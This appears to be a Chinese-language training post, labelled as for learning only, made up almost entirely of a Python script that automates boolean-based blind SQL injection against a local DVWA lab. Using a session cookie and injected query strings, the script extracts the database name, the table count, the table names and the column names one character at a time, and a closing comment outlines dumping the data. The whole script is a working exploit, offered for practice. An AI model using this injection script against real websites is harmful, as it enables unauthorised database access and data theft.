仅供学习代码参考
1#python dvwa布尔盲注自动化脚本 2 import requests 3 import string 4 import time 5 INIT_URL="http://127.0.0.1/DVWA-master/DVWA-master/vulnerabilities/sqli_blind/index.php?id=" 6 token={"security":"low","PHPSESSID":"p7g937ga5glcvg8m5hv9o9a2ht"} #登录身份识别 7 COLUMN_NUM=11 8 COLUMN_LEN=15 9 dbLen=0 10 dbname='' 11 table_num=0 12 table=[] 13 table_name='' #暂存用 14 column=[] 15 column_name=''#暂存用 16 rightLen=0 17 18 time_start=time.time() 19 url=INIT_URL+"1&Submit=Submit#" 20 rightLen=len(requests.get(url=url,cookies=token).text) 21 print("正常返回文本长度:"+str(rightLen)) 22 #1.猜解数据库名长度 poc:" 1'and (select length(database()))="+str(dbLen)#" 23 while True: 24 dbLen +=1 25 dbUrl=INIT_URL+"1'and (select length(database()))="+str(dbLen)+"%23&Submit=Submit#" 26 print(dbUrl) 27 if len(requests.get(url=dbUrl,cookies=token).text)==rightLen: 28 print("数据库长度:"+str(dbLen)) 29 break 30 #2.猜解数据库名字 poc:" 1'and(select mid(database(),"+str(i)+",1)='"+j+"')=1#" 31 for i in range(1,dbLen+1): 32 for j in string.ascii_lowercase: 33 dbnameUrl=INIT_URL+"1'and(select mid(database(),"+str(i)+",1)='"+j+"')=1%23&Submit=Submit#" 34 print(dbnameUrl) 35 if len(requests.get(url=dbnameUrl,cookies=token).text)==rightLen: 36 dbname+=j 37 break 38 39 print("数据库名字:"+dbname) 40 41 #3.猜解数据库表数量 poc:" 1'and (select count(table_name) from information_schema.tables where table_schema='"+dbname+"')="+str(i)#" 42 43 for i in range(100): 44 dbUrl=INIT_URL+"1'and (select count(table_name) from information_schema.tables where table_schema='"+dbname+"')="+str(i)+"%23&Submit=Submit#" 45 print(dbUrl) 46 if len(requests.get(dbUrl,cookies=token).text)==rightLen: 47 print("表数量"+str(i)) 48 table_num=i 49 break 50 51 #4.猜解表名 poc:" 1'and (select ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1,1)))=103# 52 53 for i in range(table_num): 54 for k in range(COLUMN_LEN): 55 for j in range(48,123): 56 dbUrl=INIT_URL+"1'and (select ascii(substr((select table_name from information_schema.tables where table_schema='"+dbname+"' limit "+str(i)+",1),"+str(k)+",1)))="+str(j)+"%23&Submit=Submit#" 57 print(dbUrl) 58 if len(requests.get(dbUrl,cookies=token).text)==rightLen: 59 table_name+=chr(j) 60 print(table_name) 61 break 62 table.append(table_name) 63 table_name='' 64 print("表名:"+str(table)) 65 66 67 68 #5.猜解列名 poc :" 1'and (select ascii(substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),1,1)))=i 69 70 71 for m in range(table_num): 72 for i in range(COLUMN_NUM): 73 for k in range(COLUMN_LEN): 74 for j in range(48,123): 75 dbUrl=INIT_URL+"1'and (select ascii(substr((select column_name from information_schema.columns where table_schema='"+dbname+"'and table_name='"+table[m]+"' limit "+str(i)+",1),"+str(k)+",1)))="+str(j)+"%23&Submit=Submit#" 76 print(dbUrl) 77 if len(requests.get(dbUrl,cookies=token).text)==rightLen: 78 column_name+=chr(j) 79 print(column_name) 80 break 81 column_name+='/' 82 column.append(column_name) 83 column_name='' 84 print("列名:"+str(column)) 85 86 time_end=time.time() 87 print('用时:',time_end-time_start,'s') 88 print("正常返回文本长度:"+str(rightLen)) 89 print("数据库长度:"+str(dbLen)) 90 print("数据库名字:"+dbname) 91 print("表数量"+str(i)) 92 print("表名:"+str(table)) 93 print("列名:"+str(column)) 94 #6.拖库 poc: 1'and (select ascii(substr((select column[i] from dbname.table[j] limit 0,1),1,1)))=i 95 #具体列具体猜解,全部猜解时间太高
